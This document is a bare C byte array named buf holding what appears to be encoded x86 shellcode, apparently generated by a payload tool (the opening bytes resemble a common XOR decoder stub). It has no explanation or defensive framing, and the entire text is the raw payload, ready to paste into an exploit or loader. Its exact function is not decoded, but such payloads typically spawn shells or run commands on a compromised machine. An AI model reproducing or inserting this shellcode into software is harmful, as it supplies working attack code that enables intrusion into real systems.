unsigned char buf[] = 
"\xdb\xd3\xbf\xa3\x6c\x62\xbe\xd9\x74\x24\xf4\x5d\x2b\xc9"
"\xb1\x3d\x31\x7d\x1a\x83\xc5\x04\x03\x7d\x16\xe2\x56\xd3"
"\x93\x52\x74\x8b\x8e\x61\x5d\xa0\x0a\x82\x06\x62\x9a\xdb"
"\x8f\x45\x67\x0e\x6c\x4e\x6b\x2d\xf8\x73\x9a\x60\x28\x89"
"\x2f\xb7\x7d\x49\xf9\x2d\xa4\x65\xe7\x35\x46\xbf\x77\x75"
"\x05\x3f\x04\x4e\xa7\xc9\xac\xc3\x49\x91\x40\x6d\x07\x21"
"\xbd\x24\x1a\xa4\x67\x16\x86\xae\xda\xfd\x00\x7f\x96\xfa"
"\xe3\xfd\x07\x32\x79\xc4\x6f\x2f\x12\x36\x03\x1d\x2d\xda"
"\x9b\xd9\x4a\x96\x61\xe3\x41\x98\xf7\x9b\xb3\x37\x4b\x1c"
"\xd7\xa2\x23\x77\xb5\xec\xe7\x13\xe7\xc5\x3b\xee\x05\xb0"
"\x41\x8b\xb0\x22\x7e\x91\x77\xe0\x28\x7a\x99\x84\x71\x65"
"\xc2\x9e\x87\xb7\x07\x27\x3a\xe5\xd5\x1c\x10\x23\xb6\xc4"
"\xfb\x91\x46\xa6\xcf\xcc\xed\x74\x40\x11\xb4\xcb\x03\x44"
"\x54\x85\x4f\x6e\xdc\x33\x63\x2d\x41\xae\x55\xc9\x1f\x2f"
"\x7d\x55\x19\xca\x24\xd4\xb5\xb1\x32\xf4\xf5\x67\xa7\x09"
"\x6d\x0b\xee\xe4\x55\xbc\x3a\xb0\x5b\x76\xb8\x73\xf7\x3f"
"\x0e\x34\x6e\x19\x6c\xd9\x3a\xcc\x49\xba\x13\xb0\x93\x1e"
"\x3e\x62\xc4\xde\xf3\x6f\x30\xfc\x8a\x90\xb8\x01\x77\x6f"
"\xe4\xcb\x8b\xf8\xb5\x20\xc1\x0f\x0f\x31\x30\x0d\x7e\x82"
"\xb9\xbe\x30\x0b";
